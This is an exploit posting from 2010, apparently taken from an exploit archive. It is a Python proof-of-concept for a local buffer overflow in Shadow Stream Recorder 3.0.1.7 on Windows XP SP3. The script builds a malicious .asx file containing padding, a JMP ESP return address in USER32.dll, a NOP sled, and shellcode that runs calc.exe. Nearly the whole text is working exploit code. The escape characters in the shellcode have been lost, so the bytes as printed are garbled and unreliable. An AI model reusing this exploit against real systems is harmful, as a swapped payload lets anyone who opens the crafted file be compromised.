Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
Posted on 30 March 2010
=========================================================== Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow =========================================================== #!/usr/bin/python # # Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow # Date: 03-29-2010 # Author: b0telh0 # Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe # Tested on: Windows XP SP3 # # windows/exec - 228 bytes # EXITFUNC=seh, CMD=calc.exe # shellcode = ("xdaxd6xbexc4x14x6bx17x31xc9xd9x74x24xf4x58xb1" "x33x83xe8xfcx31x70x14x03x70xd0xf6x9exebx30x7f" "x60x14xc0xe0xe8xf1xf1x32x8ex72xa3x82xc4xd7x4f" "x68x88xc3xc4x1cx05xe3x6dxaax73xcax6ex1axbcx80" "xacx3cx40xdbxe0x9ex79x14xf5xdfxbex49xf5xb2x17" "x05xa7x22x13x5bx7bx42xf3xd7xc3x3cx76x27xb7xf6" "x79x78x67x8cx32x60x0cxcaxe2x91xc1x08xdexd8x6e" "xfax94xdaxa6x32x54xedx86x99x6bxc1x0bxe3xacxe6" "xf3x96xc6x14x8exa0x1cx66x54x24x81xc0x1fx9ex61" "xf0xccx79xe1xfexb9x0exadxe2x3cxc2xc5x1fxb5xe5" "x09x96x8dxc1x8dxf2x56x6bx97x5ex39x94xc7x07xe6" "x30x83xaaxf3x43xcexa0x02xc1x74x8dx04xd9x76xbe" "x6cxe8xfdx51xebxf5xd7x15x0dx07xeax83x99xbex9f" "xe9xc4x40x4ax2dxf0xc2x7fxcex07xdaxf5xcbx4cx5c" "xe5xa1xddx09x09x15xdex1bx6axf8x4cxc7x43x9fxf4" "x62x9cx55"); junk = "x41" * 26112 eip = "x53x93x37x7E" # 7E379353 USER32.dll (JMP ESP) nops = "x90" * 20 junk2 = "x41" * 3636 try: file = open('b0t.asx','w'); file.write(junk+eip+nops+shellcode+junk2); file.close(); print " [+] b0t.asx created." print "[+] Open ssrecorder.exe..." print "[+] and drag and drop b0t.asx. " except: print " [-] Error.. Can't write file to system. " # Inj3ct0r.com [2010-03-30]
